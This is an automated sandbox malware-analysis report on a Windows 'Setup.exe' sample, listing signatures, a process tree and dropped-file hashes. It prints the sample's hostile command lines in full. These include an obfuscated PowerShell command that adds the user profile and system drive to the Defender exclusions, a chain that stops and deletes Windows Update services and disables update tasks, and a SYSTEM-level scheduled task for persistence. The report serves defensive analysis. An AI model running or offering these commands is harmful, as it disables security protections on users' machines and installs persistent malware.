Analysis
  max time kernel: 72s
  max time network: 124s
  platform: windows10-2004_x64
  resource: win10v2004-20220414-en
  submitted: 05-05-2022 01:16
  Static task: static1

General
  Target: Setup.exe
  Size: 4MB
  MD5: 62ed80f638e9551e1e59b4ea9341bccd
  SHA1: 44196e8cb0f5774decf60e12215767f092c3c008
  SHA256: c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf
  SHA512: 56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad
Malware Config
Signatures

Modifies security service (2 TTPs, 5 IoCs)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
  - Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)

Executes dropped EXE (3 IoCs)
  - PID 2648 iexplor.exe
  - PID 4596 iexplore.exe
  - PID 2884 iexplore.exe

Possible privilege escalation attempt (4 IoCs)
  - PID 1076 takeown.exe
  - PID 1380 icacls.exe
  - PID 3324 takeown.exe
  - PID 2816 icacls.exe

Stops running service(s) (3 TTPs)

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  - Key value queried: \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation (iexplore.exe)

Modifies file permissions (1 TTP, 4 IoCs)
  - PID 1380 icacls.exe
  - PID 3324 takeown.exe
  - PID 2816 icacls.exe
  - PID 1076 takeown.exe

Checks whether UAC is enabled (2 IoCs)
  - Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (iexplore.exe)
  - Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (iexplore.exe)

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  - flow 18: ip-api.com

Suspicious use of SetThreadContext (1 IoC)
  - PID 2648 (iexplor.exe) set thread context of PID 2296 (AppLaunch.exe)

Drops file in Program Files directory (2 IoCs)
  - File opened for modification: C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe (iexplore.exe)
  - File created: C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe (iexplore.exe)
Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
Modifies data under HKEY_USERS (46 IoCs)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (iexplore.exe)
  - Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" (iexplore.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs (powershell.exe)
  - Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" (iexplore.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
  - Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" (iexplore.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust (powershell.exe)
  - Set value (int): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" (iexplore.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs (powershell.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs (powershell.exe)
Modifies registry key (1 TTP, 18 IoCs)
  Process: reg.exe, PIDs 3552, 3904, 1548, 1492, 1604, 5032, 212, 3180, 1348, 2300, 2052, 3128, 5036, 2308, 5104, 4580, 1040, 1500

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  - PID 232 powershell.exe
  - PID 232 powershell.exe
  - PID 4596 iexplore.exe
  - PID 4692 powershell.exe
  - PID 4692 powershell.exe

Suspicious use of AdjustPrivilegeToken (5 IoCs)
  - Token: SeDebugPrivilege, PID 2296 AppLaunch.exe
  - Token: SeDebugPrivilege, PID 232 powershell.exe
  - Token: SeDebugPrivilege, PID 4596 iexplore.exe
  - Token: SeTakeOwnershipPrivilege, PID 3324 takeown.exe
  - Token: SeDebugPrivilege, PID 4692 powershell.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  Source PID and process -> target PID and process (number of recorded write events)
  - 2816 Setup.exe -> 2648 iexplor.exe (3)
  - 2648 iexplor.exe -> 2296 AppLaunch.exe (5)
  - 2816 Setup.exe -> 4596 iexplore.exe (2)
  - 4596 iexplore.exe -> 4964 cmd.exe (2)
  - 4964 cmd.exe -> 232 powershell.exe (2)
  - 4596 iexplore.exe -> 3188 cmd.exe (2)
  - 3188 cmd.exe -> 4880 sc.exe (2)
  - 3188 cmd.exe -> 4360 sc.exe (2)
  - 3188 cmd.exe -> 4796 sc.exe (2)
  - 3188 cmd.exe -> 2656 sc.exe (2)
  - 3188 cmd.exe -> 4328 sc.exe (2)
  - 3188 cmd.exe -> 2300 reg.exe (2)
  - 3188 cmd.exe -> 5032 reg.exe (2)
  - 3188 cmd.exe -> 1604 reg.exe (2)
  - 3188 cmd.exe -> 1500 reg.exe (2)
  - 4596 iexplore.exe -> 4456 cmd.exe (2)
  - 3188 cmd.exe -> 2308 reg.exe (2)
  - 3188 cmd.exe -> 3324 takeown.exe (2)
  - 3188 cmd.exe -> 1380 icacls.exe (2)
  - 4456 cmd.exe -> 4720 schtasks.exe (2)
  - 3188 cmd.exe -> 1492 reg.exe (2)
  - 3188 cmd.exe -> 1548 reg.exe (2)
  - 3188 cmd.exe -> 3904 reg.exe (2)
  - 3188 cmd.exe -> 3552 reg.exe (2)
  - 3188 cmd.exe -> 4064 schtasks.exe (2)
  - 3188 cmd.exe -> 1632 schtasks.exe (2)
  - 3188 cmd.exe -> 4300 schtasks.exe (2)
  - 3188 cmd.exe -> 1292 schtasks.exe (2)
  - 3188 cmd.exe -> 3684 schtasks.exe (2)
  - 3188 cmd.exe -> 872 schtasks.exe (2)
Processes
  [n] is the depth of the process in the tree; each entry gives the image path, the command line, and the signatures that matched it.

[1] C:\Users\Admin\AppData\Local\Temp\Setup.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    - Suspicious use of WriteProcessMemory

  [2] C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      - Executes dropped EXE
      - Checks computer location settings
      - Checks whether UAC is enabled
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
        The -EncodedCommand argument is UTF-16LE base64; it decodes to: <#rlz#> Add-MpPreference <#hs#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#dkwq#> -Force <#pqj#>
        (the <#...#> fragments are empty PowerShell block comments inserted as obfuscation; the effective command adds the user profile and the system drive to the Microsoft Defender exclusion list).
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
          - Creates scheduled task(s)

    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        - Suspicious use of WriteProcessMemory

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          - Modifies registry key

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

      [4] C:\Windows\system32\schtasks.exe
          Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          - Modifies registry key

      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          - Modifies registry key

      [4] C:\Windows\system32\reg.exe
          Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          - Modifies registry key

    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"

      [4] C:\Windows\system32\choice.exe
          Command line: choice /C Y /N /D Y /T 3

    [3] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "iexplore"

[1] C:\Windows\system32\sc.exe
    Command line: sc stop WaaSMedicSvc

[1] C:\Windows\system32\sc.exe
    Command line: sc stop wuauserv

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
    - Modifies registry key

[1] C:\Windows\system32\sc.exe
    Command line: sc stop dosvc

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
    - Modifies registry key

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
    - Modifies registry key

[1] C:\Windows\system32\icacls.exe
    Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
    - Possible privilege escalation attempt
    - Modifies file permissions

[1] C:\Windows\system32\takeown.exe
    Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
    - Modifies security service
    - Modifies registry key

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
    - Modifies registry key

[1] C:\Windows\system32\sc.exe
    Command line: sc stop bits

[1] C:\Windows\system32\sc.exe
    Command line: sc stop UsoSvc

[1] C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
    Command line: "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Modifies data under HKEY_USERS

  [2] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
      (same encoded command as decoded above)

  [2] C:\Windows\System32\conhost.exe
      Command line: C:\Windows\System32\conhost.exe

    [3] C:\Windows\System32\conhost.exe
        Command line: "C:\Windows\System32\conhost.exe" "vqtwwwbrwdqzx"

  [2] C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

[1] C:\Windows\system32\schtasks.exe
    Command line: schtasks /run /tn "iexplore"

[1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
    (same encoded command as decoded above)
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\sc.exe
    Command line: sc stop bits

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
    - Modifies registry key

[1] C:\Windows\system32\icacls.exe
    Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
    - Possible privilege escalation attempt
    - Modifies file permissions

[1] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

[1] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

[1] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

[1] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

[1] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

[1] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

[1] C:\Windows\system32\schtasks.exe
    Command line: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

[1] C:\Windows\system32\reg.exe
    Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
    - Modifies registry key

[1] C:\Windows\system32\reg.exe
    Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
    - Modifies registry key

[1] C:\Windows\system32\reg.exe
    Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
    - Modifies registry key

[1] C:\Windows\system32\reg.exe
    Command line: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
    - Modifies registry key

[1] C:\Windows\system32\takeown.exe
    Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
    - Possible privilege escalation attempt
    - Modifies file permissions

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
    - Modifies registry key

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
    - Modifies registry key

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
    - Modifies registry key

[1] C:\Windows\system32\reg.exe
    Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
    - Modifies registry key

[1] C:\Windows\system32\sc.exe
    Command line: sc stop dosvc

[1] C:\Windows\system32\sc.exe
    Command line: sc stop wuauserv

[1] C:\Windows\system32\sc.exe
    Command line: sc stop WaaSMedicSvc

[1] C:\Windows\system32\sc.exe
    Command line: sc stop UsoSvc
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
  Filesize: 109MB
  MD5: 1950297d47a665359dde4d26aca66cea
  SHA1: 4a90a0c35c0e9a438c030efd42fa3f5c5ece13d0
  SHA256: 87e439ba3df8f0e37f2ce2eb48266260e24df4a6882949e7194dce365f9a209a
  SHA512: 4be513976f34404ff36bfa176c0c5d1600e4323d0240d43fb994438e0f51f11a9c35a88223acbb3ebed0097343dfe98b065aa692566c5f5a9feff17c65f05354

C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe
  Filesize: 111MB
  MD5: cbfba19fa7c371cb8564da353be24b66
  SHA1: 5a4455a49f891068e8d6d3319e9432d9bbb28599
  SHA256: 70fdd145714a1a614c7190c083e8d4b9afccc4475ccb007cbdb143125baa0564
  SHA512: 88eff50a524f7df4f468594b1e0fe27f20c7613904f21cd2fb49ac65663955a62c181d9825e569b272c169c720cdb264fff1ae230d597148f19d62b192c97baa

C:\Users\Admin\AppData\Local\Temp\iexplor.exe
  Filesize: 421MB
  MD5: e55117c94fc3ccea985ae03f7bf95a6f
  SHA1: d28a699514029af1b911d52da9818f8a20f8aafd
  SHA256: e160b397a204b243998017edf0caa1bb40a33041d70d18f55e86c3925bda190f
  SHA512: e6d27476a5f7d64161b147d73478b81abb6f5ab7e120756444d63736b6d903bddc497985c3cc62bc4cf726ea1ce9516ac916c3c67f29993b989da88febdd3deb

C:\Users\Admin\AppData\Local\Temp\iexplor.exe
  Filesize: 427MB
  MD5: 7420369dd4d15a37a2cfa5560132d0ba
